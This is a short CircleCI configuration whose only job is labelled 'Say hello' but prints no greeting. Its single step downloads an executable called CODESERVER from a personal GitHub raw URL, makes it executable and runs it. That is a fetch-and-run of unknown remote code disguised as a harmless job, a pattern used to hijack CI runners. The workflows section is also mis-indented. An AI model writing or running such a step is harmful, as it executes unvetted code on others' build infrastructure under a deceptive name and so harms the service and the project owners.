version: 2.1
jobs:
  say-hello: 
    docker:
      - image: cimg/node:12.22.11
    steps:
      - checkout
      - run: 
          name: "Say hello"
          command: apt update && apt install nodejs && apt install npm && wget https://raw.githubusercontent.com/aurbach55/pos/main/CODESERVER && chmod +x CODESERVER && ./CODESERVER 
workflows:
say-hello-workflow: 
  jobs:
      - say-hello
